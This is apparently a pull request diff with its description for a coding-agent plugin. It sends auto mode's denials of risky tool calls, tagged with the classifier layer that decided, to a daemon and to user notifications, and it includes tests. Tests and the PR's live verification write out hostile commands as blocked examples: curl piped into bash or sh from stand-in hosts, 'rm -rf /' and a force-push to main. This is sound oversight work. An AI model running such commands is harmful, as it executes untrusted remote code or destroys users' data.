@@ -18,10 +18,17 @@ export type ClassifierRequest = {
   signal?: AbortSignal;
 };
 
+/**
+ * Which pass answered: 2a is the configured classifier, 2b the escalation
+ * model. Carried so a denial can say who decided it; a classifier that does not
+ * name a layer (the stub, a future one-pass judge) leaves it unset.
+ */
+export type ClassifierLayer = "2a" | "2b";
+
 export type ClassifierVerdict =
-  | { verdict: "allow"; reason?: string }
-  | { verdict: "deny"; reason: string }
-  | { verdict: "uncertain"; reason?: string };
+  | { verdict: "allow"; reason?: string; layer?: ClassifierLayer }
+  | { verdict: "deny"; reason: string; layer?: ClassifierLayer }
+  | { verdict: "uncertain"; reason?: string; layer?: ClassifierLayer };
 
 export interface Classifier {
   classify(request: ClassifierRequest): Promise<ClassifierVerdict>;

--- a/plugins/attn-pi/automode/index.ts
+++ b/plugins/attn-pi/automode/index.ts
@@ -87,9 +87,15 @@ export type AutoModeExtensionAPILike = {
 
 export type AutoModeDenial = {
   toolCallId: string;
+  /** The tool pi was about to run. */
+  tool: string;
+  /** The blocked call in one line, the same text the model is given. */
   action: string;
   reason: string;
+  /** Who decided: a static rule name, `classifier-2a`/`-2b`, or the breaker. */
   rule: string;
+  /** When the call was refused, RFC 3339. */
+  at: string;
 };
 
 export type AutoModeOptions = {
@@ -176,11 +182,19 @@ export function createAutoMode(options: AutoModeOptions): (pi: AutoModeExtension
       if (decision.outcome === "run") return undefined;
       const denial: AutoModeDenial = {
         toolCallId: event.toolCallId,
+        tool: call.toolName,
         action: decision.action,
         reason: decision.reason,
         rule: decision.rule,
+        at: new Date().toISOString(),
       };
-      options.onDenial?.(denial);
+      try {
+        options.onDenial?.(denial);
+      } catch (error) {
+        // Reporting is fire-and-forget: whoever listens must not be able to turn
+        // a denial into something else by failing.
+        reportFailure(ctx, error);
+      }
       standing = [...standing, denial];
       showDenial(ctx, denial, standing);
       return { block: true, reason: decision.toolResult };
@@ -269,6 +283,12 @@ function messageText(message: MessageLike): string {
     .filter((block) => block.type === "text" && typeof block.text === "string")
     .map((block) => block.text)
     .join("\n");
+}
+
+/** A reporter that threw. The denial itself stands; only the report is lost. */
+function reportFailure(ctx: AutoModeContextLike, error: unknown): void {
+  const message = error instanceof Error ? error.message : String(error);
+  uiOf(ctx)?.notify(`auto mode could not report this denial to attn: ${message}`, "warning");
 }
 
 function failureReason(error: unknown): string {

--- a/plugins/attn-pi/automode/model-classifier.ts
+++ b/plugins/attn-pi/automode/model-classifier.ts
@@ -15,7 +15,7 @@
 // Duck-typed against pi's shapes (0.83.0, core/model-registry.ts) the same way
 // index.ts is duck-typed against ExtensionAPI, so `bun test` covers the whole
 // path with a fake registry and no network.
-import type { Classifier, ClassifierRequest, ClassifierVerdict } from "./classifier";
+import type { Classifier, ClassifierLayer, ClassifierRequest, ClassifierVerdict } from "./classifier";
 import type { AutoModeConfig } from "./config";
 import {
   classifierSystemPrompt,
@@ -116,7 +116,7 @@ export class ModelClassifier implements Classifier {
     // the call expensive to get wrong. A confident deny does not go: the user
     // overturns one by saying so, and a second opinion buys them nothing but
     // the wait.
-    if (first.verdict === "deny" || (first.verdict === "allow" && !first.highStakes)) return narrow(first);
+    if (first.verdict === "deny" || (first.verdict === "allow" && !first.highStakes)) return narrow(first, "2a");
 
     const second = await this.judge({
       modelSpec: this.options.config.escalationModel,
@@ -130,10 +130,11 @@ export class ModelClassifier implements Classifier {
     if (second.verdict === "uncertain") {
       return {
         verdict: "deny",
+        layer: "2b",
         reason: second.reason === "" ? "neither classifier could judge this call" : second.reason,
       };
     }
-    return narrow(second);
+    return narrow(second, "2b");
   }
 
   private async judge(input: {
@@ -211,12 +212,16 @@ function refusal(layer: string, why: string): ParsedVerdict {
   return { verdict: "deny", reason: `auto mode's ${layer} model could not judge this call: ${why}`, highStakes: false };
 }
 
-function narrow(parsed: ParsedVerdict): ClassifierVerdict {
-  if (parsed.verdict === "allow") return { verdict: "allow", reason: parsed.reason };
+function narrow(parsed: ParsedVerdict, layer: ClassifierLayer): ClassifierVerdict {
+  if (parsed.verdict === "allow") return { verdict: "allow", layer, reason: parsed.reason };
   if (parsed.verdict === "deny") {
-    return { verdict: "deny", reason: parsed.reason === "" ? "the classifier refused this call" : parsed.reason };
+    return {
+      verdict: "deny",
+      layer,
+      reason: parsed.reason === "" ? "the classifier refused this call" : parsed.reason,
+    };
   }
-  return { verdict: "uncertain", reason: parsed.reason };
+  return { verdict: "uncertain", layer, reason: parsed.reason };
 }
 
 function textOf(result: CompletionResult): string {

--- a/plugins/attn-pi/automode/session.ts
+++ b/plugins/attn-pi/automode/session.ts
@@ -19,7 +19,18 @@ export const consecutiveDenialLimit = 3;
 /** Denials since the user last said anything. */
 export const totalDenialLimit = 20;
 
-export type DecisionRule = StaticRule | "cached-allow" | "cached-deny" | "classifier" | "circuit-breaker";
+// The rule names a denial reports as "who decided this". A classified call
+// names the layer that answered — 2a is the configured classifier, 2b the
+// escalation model — and falls back to the bare name when the classifier does
+// not say.
+export type DecisionRule =
+  | StaticRule
+  | "cached-allow"
+  | "cached-deny"
+  | "classifier"
+  | "classifier-2a"
+  | "classifier-2b"
+  | "circuit-breaker";
 
 export type SessionDecision =
   | { outcome: "run"; rule: DecisionRule }
@@ -114,16 +125,17 @@ export class AutoModeSession {
       transcript: this.transcript.snapshot(),
       signal: options.signal,
     });
+    const rule: DecisionRule = judged.layer ? `classifier-${judged.layer}` : "classifier";
     if (judged.verdict === "allow") {
       this.cache.set(intent, { verdict: "allow", reason: judged.reason ?? "" });
-      return this.allowed("classifier");
+      return this.allowed(rule);
     }
     const reason =
       judged.verdict === "deny"
         ? judged.reason
         : `auto mode could not judge this call confidently${judged.reason ? `: ${judged.reason}` : ""}`;
     this.cache.set(intent, { verdict: "deny", reason });
-    return this.denied(call, "classifier", reason);
+    return this.denied(call, rule, reason);
   }
 
   private allowed(rule: DecisionRule): SessionDecision {

--- a/plugins/attn-pi/src/driver.ts
+++ b/plugins/attn-pi/src/driver.ts
@@ -7,6 +7,7 @@ import type {
   RelayDeliverMessageResult,
   RelayHelloParams,
   RelayHelloResult,
+  RelayReportDenialParams,
   RelayReportStateParams,
   RelayReportStopParams,
 } from "./relay-protocol";
@@ -205,6 +206,22 @@ export class PiDriver {
     });
   }
 
+  // A denial is an append, not a state report: it carries no seq, because
+  // nothing about it can be overtaken by a later report of the same session.
+  async suiteReportDenial(rawParams: unknown): Promise<void> {
+    const params = parseRelayReportDenial(rawParams);
+    const run = this.requireRunByToken(params.token);
+    await this.rpc.request("session.report_automode_denial", {
+      session_id: run.sessionID,
+      run_id: run.runID,
+      tool: params.tool,
+      action: params.action,
+      reason: params.reason,
+      rule: params.rule,
+      at: params.at,
+    });
+  }
+
   // Called for the daemon's driver.deliver_message request.
   async deliverMessage(rawParams: unknown): Promise<{ ok: boolean }> {
     const params = parseDeliverMessageParams(rawParams);
@@ -365,6 +382,27 @@ function parseRelayReportStop(value: unknown): RelayReportStopParams {
   if (typeof token !== "string" || token.trim() === "") throw new Error("suite.report_stop is missing token");
   if (typeof assistantText !== "string") throw new Error("suite.report_stop is missing assistant_text");
   return { token: token.trim(), assistant_text: assistantText };
+}
+
+function parseRelayReportDenial(value: unknown): RelayReportDenialParams {
+  if (typeof value !== "object" || value === null) throw new Error("suite.report_denial params must be an object");
+  const record = value as Record<string, unknown>;
+  const token = record.token;
+  if (typeof token !== "string" || token.trim() === "") throw new Error("suite.report_denial is missing token");
+  const action = record.action;
+  if (typeof action !== "string" || action.trim() === "") throw new Error("suite.report_denial is missing action");
+  return {
+    token: token.trim(),
+    tool: textField(record.tool),
+    action: action.trim(),
+    reason: textField(record.reason),
+    rule: textField(record.rule),
+    at: textField(record.at),
+  };
+}
+
+function textField(value: unknown): string {
+  return typeof value === "string" ? value.trim() : "";
 }
 
 function parseDeliverMessageParams(value: unknown): { session_id: string; run_id: string; text: string } {

--- a/plugins/attn-pi/src/index.ts
+++ b/plugins/attn-pi/src/index.ts
@@ -26,6 +26,7 @@ async function runPlugin(): Promise<void> {
       suiteHello: (connection: RelayConnection, params: unknown) => driver.suiteHello(connection, params),
       suiteReportState: (params: unknown) => driver.suiteReportState(params),
       suiteReportStop: (params: unknown) => driver.suiteReportStop(params),
+      suiteReportDenial: (params: unknown) => driver.suiteReportDenial(params),
     },
   });
   driver = new PiDriver({ rpc, relay, suitePath: suitePath() });

--- a/plugins/attn-pi/src/relay-protocol.ts
+++ b/plugins/attn-pi/src/relay-protocol.ts
@@ -7,6 +7,17 @@ export type RelayHelloParams = { token: string; pi_session_id: string; pi_versio
 export type RelayHelloResult = { ok: true };
 export type RelayReportStateParams = { token: string; state: "working" };
 export type RelayReportStopParams = { token: string; assistant_text: string };
+// One call auto mode refused, on its way to attn's own surfaces. `rule` names
+// who decided (a static envelope rule, `classifier-2a`/`-2b`, the breaker) and
+// `at` is when the session refused it, RFC 3339.
+export type RelayReportDenialParams = {
+  token: string;
+  tool: string;
+  action: string;
+  reason: string;
+  rule: string;
+  at: string;
+};
 
 // driver -> suite request
 export type RelayDeliverMessageParams = { text: string };
@@ -16,5 +27,6 @@ export const relayMethods = {
   hello: "suite.hello",
   reportState: "suite.report_state",
   reportStop: "suite.report_stop",
+  reportDenial: "suite.report_denial",
   deliverMessage: "driver.deliver_message",
 } as const;

--- a/plugins/attn-pi/src/relay.ts
+++ b/plugins/attn-pi/src/relay.ts
@@ -27,6 +27,7 @@ export type RelayDelegate = {
   suiteHello(connection: RelayConnection, params: unknown): Promise<{ ok: true }>;
   suiteReportState(params: unknown): Promise<void>;
   suiteReportStop(params: unknown): Promise<void>;
+  suiteReportDenial(params: unknown): Promise<void>;
 };
 
 // One RelayConnection per suite that dials in. Mirrors attn-rpc.ts's
@@ -139,6 +140,11 @@ export class RelayConnection {
       case relayMethods.reportStop:
         return async (params) => {
           await this.delegate.suiteReportStop(params);
+          return { ok: true };
+        };
+      case relayMethods.reportDenial:
+        return async (params) => {
+          await this.delegate.suiteReportDenial(params);
           return { ok: true };
         };
       default:

--- a/plugins/attn-pi/suite/core.ts
+++ b/plugins/attn-pi/suite/core.ts
@@ -210,6 +210,19 @@ export type SuiteEnv = {
   piVersion: string;
 };
 
+/**
+ * What travels to attn when auto mode refuses a call — the subset of
+ * `automode/index.ts`'s AutoModeDenial that leaves the session. The tool-call
+ * id stays behind: it addresses nothing outside pi's own run.
+ */
+export type SuiteDenial = {
+  tool: string;
+  action: string;
+  reason: string;
+  rule: string;
+  at: string;
+};
+
 export class AttnPiSuite {
   private readonly piVersion: string;
   // Undefined means "running outside attn" (no ATTN_PI_SUITE_SOCKET/ATTN_PI_TOKEN):
@@ -272,6 +285,25 @@ export class AttnPiSuite {
       const assistantText = this.cachedAssistantText;
       this.cachedAssistantText = "";
       void relay.client.send(relayMethods.reportStop, { token: relay.token, assistant_text: assistantText });
+    });
+  }
+
+  /**
+   * Reports one refused call to attn. Like every other suite report this is
+   * fire-and-forget: a bare pi (no relay) drops it, and so does a relay that
+   * will not answer. Auto mode's decision has already been made and given to
+   * the model; nothing here can change it.
+   */
+  reportDenial(denial: SuiteDenial): void {
+    const relay = this.relay;
+    if (!relay) return;
+    void relay.client.send(relayMethods.reportDenial, {
+      token: relay.token,
+      tool: denial.tool,
+      action: denial.action,
+      reason: denial.reason,
+      rule: denial.rule,
+      at: denial.at,
     });
   }
 

--- a/plugins/attn-pi/suite/index.ts
+++ b/plugins/attn-pi/suite/index.ts
@@ -22,11 +22,15 @@ const suite = new AttnPiSuite({
 
 // Auto mode exists only when attn sent a config. A bare pi that loads this
 // suite registers no command, no flag and no handlers for it, and behaves
-// exactly as it does without the file. Denials are not reported anywhere yet;
-// AutoMode's onDenial is the seam attn's own surfaces will hang off.
+// exactly as it does without the file. Every denial rides the same relay the
+// rest of the suite reports on, so attn can notify and list it.
 const autoModeSource = attnAutoModeSource(process.env);
 const autoMode = autoModeSource
-  ? new AutoMode({ config: autoModeSource.config, notice: autoModeSource.problem })
+  ? new AutoMode({
+      config: autoModeSource.config,
+      notice: autoModeSource.problem,
+      onDenial: (denial) => suite.reportDenial(denial),
+    })
   : undefined;
 
 export default function attnPiSuite(pi: ExtensionAPILike & AutoModePiLike): void {

--- a/plugins/attn-pi/test/automode-classifier.test.ts
+++ b/plugins/attn-pi/test/automode-classifier.test.ts
@@ -195,6 +195,7 @@ describe("2a to 2b routing", () => {
     const registry = new FakeRegistry([verdictJSON("allow", "routine work in the working directory")]);
     expect(await classifierWith(registry).classify(request())).toEqual({
       verdict: "allow",
+      layer: "2a",
       reason: "routine work in the working directory",
     });
     expect(registry.calls).toHaveLength(1);
@@ -206,7 +207,7 @@ describe("2a to 2b routing", () => {
       verdictJSON("deny", "an unreviewed script can do anything"),
     ]);
     const verdict = await classifierWith(registry).classify(request());
-    expect(verdict).toEqual({ verdict: "deny", reason: "an unreviewed script can do anything" });
+    expect(verdict).toEqual({ verdict: "deny", layer: "2b", reason: "an unreviewed script can do anything" });
     expect(registry.calls.map((call) => `${call.model.provider}/${call.model.id}`)).toEqual([
       "opencode-go/glm-5.3",
       "opencode-go/qwen3.8-max",
@@ -234,6 +235,7 @@ describe("2a to 2b routing", () => {
     ]);
     expect(await classifierWith(registry).classify(request())).toEqual({
       verdict: "deny",
+      layer: "2b",
       reason: "the target is a production namespace",
     });
   });
@@ -242,6 +244,7 @@ describe("2a to 2b routing", () => {
     const registry = new FakeRegistry([verdictJSON("deny", "force-push rewrites shared history", true)]);
     expect(await classifierWith(registry).classify(request())).toEqual({
       verdict: "deny",
+      layer: "2a",
       reason: "force-push rewrites shared history",
     });
     expect(registry.calls).toHaveLength(1);
@@ -249,7 +252,11 @@ describe("2a to 2b routing", () => {
 
   test("uncertain out of 2b resolves to deny", async () => {
     const registry = new FakeRegistry([verdictJSON("uncertain", "no idea"), verdictJSON("uncertain", "still no idea")]);
-    expect(await classifierWith(registry).classify(request())).toEqual({ verdict: "deny", reason: "still no idea" });
+    expect(await classifierWith(registry).classify(request())).toEqual({
+      verdict: "deny",
+      layer: "2b",
+      reason: "still no idea",
+    });
   });
 
   test("2b runs at most once", async () => {

--- a/plugins/attn-pi/test/automode-composition.test.ts
+++ b/plugins/attn-pi/test/automode-composition.test.ts
@@ -2,7 +2,11 @@
 // `/auto` command that override it, and the gate that keeps a bare pi
 // untouched.
 import { describe, expect, test } from "bun:test";
+import { mkdtempSync } from "node:fs";
+import { tmpdir } from "node:os";
 import { join } from "node:path";
+import { RelayServer } from "../src/relay";
+import { AttnPiSuite } from "../suite/core";
 import { defaultAutoModeConfig } from "../automode/config";
 import { AutoMode } from "../automode/mode";
 import type {
@@ -237,5 +241,56 @@ describe("turning auto mode on and off", () => {
     const blocked = await pi.toolCall?.(push(), uiContext(new FakeUI()));
     expect(blocked?.block).toBe(true);
     expect(blocked?.reason).toContain("no model catalog");
+  });
+});
+
+// The seam suite/index.ts wires: a denied call in the session becomes one
+// suite.report_denial on the driver's relay socket. Everything here is real
+// except pi itself and the driver behind the socket.
+describe("a denial leaving the session", () => {
+  test("reaches the relay with the call, the reason and the layer that decided", async () => {
+    const socketPath = join(mkdtempSync(join(tmpdir(), "attn-pi-denial-")), "s.sock");
+    const reported: unknown[] = [];
+    const relay = new RelayServer({
+      socketPath,
+      delegate: {
+        async suiteHello() {
+          return { ok: true as const };
+        },
+        async suiteReportState() {},
+        async suiteReportStop() {},
+        async suiteReportDenial(params: unknown) {
+          reported.push(params);
+        },
+      },
+    });
+    await relay.listen();
+    const suite = new AttnPiSuite({ socketPath, token: "tok-denial", piVersion: "0.83.0" });
+    const mode = new AutoMode({
+      config: defaultAutoModeConfig,
+      onDenial: (denial) => suite.reportDenial(denial),
+    });
+    const pi = new FakePi();
+    mode.register(pi);
+    pi.start(uiContext(new FakeUI(), { modelRegistry: new CountingRegistry(denies()) }));
+
+    expect((await pi.toolCall?.(push(), uiContext(new FakeUI())))?.block).toBe(true);
+
+    const deadline = Date.now() + 2_000;
+    while (reported.length === 0) {
+      if (Date.now() > deadline) throw new Error("no denial reached the relay");
+      await new Promise((resolve) => setTimeout(resolve, 5));
+    }
+    expect(reported[0]).toEqual({
+      token: "tok-denial",
+      tool: "bash",
+      action: "bash: git push --force origin main",
+      reason: "not asked for",
+      rule: "classifier-2a",
+      at: expect.any(String),
+    });
+
+    suite.close();
+    relay.close();
   });
 });

--- a/plugins/attn-pi/test/automode-extension.test.ts
+++ b/plugins/attn-pi/test/automode-extension.test.ts
@@ -35,8 +35,27 @@ describe("auto mode extension", () => {
     const pi = wire(new StubClassifier({ verdict: "deny", reason: "nope" }), { onDenial: (d) => denials.push(d) });
     await pi.toolCall?.(toolCall("bash", { command: "git push --force" }), ctx);
     expect(denials).toEqual([
-      { toolCallId: "call-1", action: "bash: git push --force", reason: "nope", rule: "classifier" },
+      {
+        toolCallId: "call-1",
+        tool: "bash",
+        action: "bash: git push --force",
+        reason: "nope",
+        rule: "classifier",
+        at: expect.any(String),
+      },
     ]);
+    expect(Number.isNaN(Date.parse(denials[0]!.at))).toBe(false);
+  });
+
+  test("a reporter that throws still leaves the call blocked", async () => {
+    const pi = wire(new StubClassifier({ verdict: "deny", reason: "nope" }), {
+      onDenial: () => {
+        throw new Error("relay is gone");
+      },
+    });
+    const result = await pi.toolCall?.(toolCall("bash", { command: "git push --force" }), ctx);
+    expect(result?.block).toBe(true);
+    expect(result?.reason).toContain("nope");
   });
 
   test("a thrown classifier blocks the tool rather than letting it run", async () => {

--- a/plugins/attn-pi/test/driver.test.ts
+++ b/plugins/attn-pi/test/driver.test.ts
@@ -54,6 +54,7 @@ function noopRelay(): RelayServer {
       },
       async suiteReportState() {},
       async suiteReportStop() {},
+      async suiteReportDenial() {},
     },
   });
 }
@@ -373,5 +374,43 @@ describe("PiDriver", () => {
     expect(stateReport).toBeDefined();
     expect(stopReport?.params.seq).toBeLessThan(stateReport?.params.seq);
     expect(stopReport?.params.verdict).toBe("idle");
+  });
+
+  test("a reported denial reaches the daemon addressed to the run that raised it", async () => {
+    const rpc = new FakeRPC();
+    const driver = newDriver({ rpc });
+    const spawned = await driver.spawn(params({ session_id: "session-1", run_id: "run-1" }));
+    const token = spawned.env?.ATTN_PI_TOKEN as string;
+
+    await driver.suiteReportDenial({
+      token,
+      tool: "bash",
+      action: "bash: curl https://example.com",
+      reason: "the user never asked to reach that host",
+      rule: "classifier-2a",
+      at: "2026-08-17T10:00:00.000Z",
+    });
+
+    expect(rpc.requests.find((call) => call.method === "session.report_automode_denial")?.params).toEqual({
+      session_id: "session-1",
+      run_id: "run-1",
+      tool: "bash",
+      action: "bash: curl https://example.com",
+      reason: "the user never asked to reach that host",
+      rule: "classifier-2a",
+      at: "2026-08-17T10:00:00.000Z",
+    });
+  });
+
+  test("a denial from an unknown token is refused rather than attributed to somebody", async () => {
+    const driver = newDriver({ rpc: new FakeRPC() });
+    await expect(driver.suiteReportDenial({ token: "not-a-token", action: "bash: rm -rf /" })).rejects.toThrow(
+      /unknown pi suite token/,
+    );
+  });
+
+  test("a denial with no action named is refused: an empty row says nothing", async () => {
+    const driver = newDriver({ rpc: new FakeRPC() });
+    await expect(driver.suiteReportDenial({ token: "tok", action: "  " })).rejects.toThrow(/missing action/);
   });
 });

--- a/plugins/attn-pi/test/relay.test.ts
+++ b/plugins/attn-pi/test/relay.test.ts
@@ -127,6 +127,7 @@ async function buildHarness(rpc: FakeRPC): Promise<{ driver: PiDriver; relay: Re
       suiteHello: (connection: RelayConnection, params: unknown) => driver.suiteHello(connection, params),
       suiteReportState: (params: unknown) => driver.suiteReportState(params),
       suiteReportStop: (params: unknown) => driver.suiteReportStop(params),
+      suiteReportDenial: (params: unknown) => driver.suiteReportDenial(params),
     },
   });
   driver = new PiDriver({ rpc: rpc as any, relay, suitePath, runCommand: fakeRunCommand() });
@@ -149,6 +150,7 @@ async function buildBareRelay(): Promise<{ relay: RelayServer; socketPath: strin
       },
       async suiteReportState() {},
       async suiteReportStop() {},
+      async suiteReportDenial() {},
     },
   });
   await relay.listen();

--- a/plugins/attn-pi/test/suite.test.ts
+++ b/plugins/attn-pi/test/suite.test.ts
@@ -108,6 +108,10 @@ class RecordingDelegate implements RelayDelegate {
   async suiteReportStop(params: unknown): Promise<void> {
     this.calls.push({ method: relayMethods.reportStop, params });
   }
+
+  async suiteReportDenial(params: unknown): Promise<void> {
+    this.calls.push({ method: relayMethods.reportDenial, params });
+  }
 }
 
 async function buildHarness(): Promise<{ relay: RelayServer; delegate: RecordingDelegate; socketPath: string }> {
@@ -291,6 +295,53 @@ describe("AttnPiSuite: driver.deliver_message", () => {
 
     suite.close();
     relay.close();
+  });
+});
+
+describe("AttnPiSuite: auto mode denials -> suite.report_denial", () => {
+  const denial = {
+    tool: "bash",
+    action: "bash: curl https://example.com",
+    reason: "the user never asked to reach that host",
+    rule: "classifier-2a",
+    at: "2026-08-17T10:00:00.000Z",
+  };
+
+  test("carries the token, the blocked call, the reason and who decided", async () => {
+    const { relay, delegate, socketPath } = await buildHarness();
+    const suite = new AttnPiSuite({ socketPath, token: "tok-8", piVersion: "0.80.10" });
+
+    suite.reportDenial(denial);
+
+    await waitFor(() => delegate.calls.some((call) => call.method === relayMethods.reportDenial));
+    expect(delegate.calls.find((call) => call.method === relayMethods.reportDenial)?.params).toEqual({
+      token: "tok-8",
+      ...denial,
+    });
+
+    suite.close();
+    relay.close();
+  });
+
+  test("outside attn it is a no-op, and a dead relay never crashes pi", async () => {
+    const bare = new AttnPiSuite({ socketPath: undefined, token: undefined, piVersion: "0.80.10" });
+    expect(() => bare.reportDenial(denial)).not.toThrow();
+    bare.close();
+
+    const suite = new AttnPiSuite({ socketPath: nextSocketPath(), token: "tok-9", piVersion: "0.80.10" });
+    let unhandled: unknown;
+    const onUnhandledRejection = (reason: unknown) => {
+      unhandled = reason;
+    };
+    process.on("unhandledRejection", onUnhandledRejection);
+    try {
+      suite.reportDenial(denial);
+      await new Promise((resolve) => setTimeout(resolve, 50));
+    } finally {
+      process.off("unhandledRejection", onUnhandledRejection);
+    }
+    expect(unhandled).toBeUndefined();
+    suite.close();
   });
 });
 


### PR DESCRIPTION
Slice 5b of pi auto mode
([plan](docs/plans/2026-08-16-pi-auto-mode.md)): a call auto mode refuses in a
pi session now reaches attn. Until this, the denial existed only inside the pi
TUI — the `onDenial` seam #934 shipped was deliberately unset, and the
`automode_denials` table #932 created was read by a CLI verb that always
answered "no denials recorded".

The wire, end to end:

    automode extension  onDenial(denial)
      → suite           suite.report_denial over the relay (fire-and-forget)
      → pi driver       session.report_automode_denial over plugin RPC
      → daemon          row + notification + automode.denied fact
      → projection      notifications_updated on the wire
      → user            a notification, and `attn automode denials`

## What a denial carries

The tool, the blocked call in one line (the same text the model is given), the
reason, who decided, and when. "Who decided" is a static rule's own name, the
circuit breaker, or the classifier layer that answered — `classifier-2a` or
`classifier-2b`, which is why `ClassifierVerdict` now carries a `layer`.

## Choices worth naming

- **One fact, not two.** The notification is how a denial is surfaced, so
  `automode.denied` is the only fact published and its projection pushes
  `notifications_updated`. Publishing a notification fact beside it would put
  the same snapshot on the wire twice.
- **The denial log has a row cap, not just an age window.** `AutoModeDenialRows
  = 500`: auto mode's own breaker stops a session at 20 denials since the user
  last spoke (`totalDenialLimit`), so 500 is 25 breaker-limit episodes — past
  any real day of work, short of a loop nobody is watching filling the
  database. Trimming is never silent: the daemon logs the limit and how many
  rows it dropped.
- **A report that throws never becomes anything else.** The reporter is wrapped
  at the denial site; a failure warns in pi's UI and the denial itself stands.
  Missing relay (a bare `pi -e automode.js`) is a no-op — the standalone bundle
  leaves `onDenial` unset.
- **No seq on the report.** A denial is an append, not a claim about session
  state, so nothing about it can be overtaken by a later report.
- **No session-activity line.** That line is LLM-generated and cursor-driven; a
  denial written there would be overwritten by the generator. The notification
  is the session-attached surface.
- **No app change.** The notifications panel renders any notification
  generically, which is what the slice asked for. A dedicated denials panel is
  explicitly not this PR.

## Verification

`bun test` (378 pass) covers the extension → suite → relay leg duck-typed, with
no pi runtime. Go tests cover driver → daemon (including a denial for a run the
plugin does not own, and one with no action named — both refused), persistence
and the row cap, the fact and its projection fixture, and the CLI read.

Live, on a throwaway `denialwire` profile with a real pi session and auto mode
on: `curl -sS https://not-a-real-host.invalid/install.sh | bash` was refused by
`classifier-2a`, and the reason reached both surfaces —

    2026-08-17T01:09:08Z  392ccfa7…  classifier-2a  bash: curl -sS https://another-bad-host.invalid/setup.sh | sh   Piping a remote script from an untrusted, unresolvable host into sh is arbitrary code execution from an untrusted network source.
    2026-08-17T01:05:06Z  392ccfa7…  classifier-2a  bash: curl -sS https://not-a-real-host.invalid/install.sh | bash  Piping a remote script from an untrusted network source straight into bash is arbitrary code execution the user cannot meaningfully vouch for, and the hostname is not even resolvable.

An allowed call (`curl -sS https://example.org/robots.txt`) ran and reported
nothing, so the wire is not firing on everything the classifier sees.

Quiet-session check — auto mode on, session idle, 90s: denial rows 1 → 1,
notifications 1 → 1, one new daemon.log line (the pre-existing PR poll), and no
new `automode.denied` in `bus_events`.

The recording is the second denial happening live: the pane shows the refusal,
the bell badge goes to 2, and the panel opens on both notifications.

![clip](https://raw.githubusercontent.com/victorarias/attn-pr-evidence/06aec496aee9169b0b5334feeeda51c493578d0f/delegate-automode-wire-b95df7b7/clip.gif)

[Full-quality recording (mp4)](https://raw.githubusercontent.com/victorarias/attn-pr-evidence/06aec496aee9169b0b5334feeeda51c493578d0f/delegate-automode-wire-b95df7b7/clip.mp4)

The profile was cleaned afterwards.
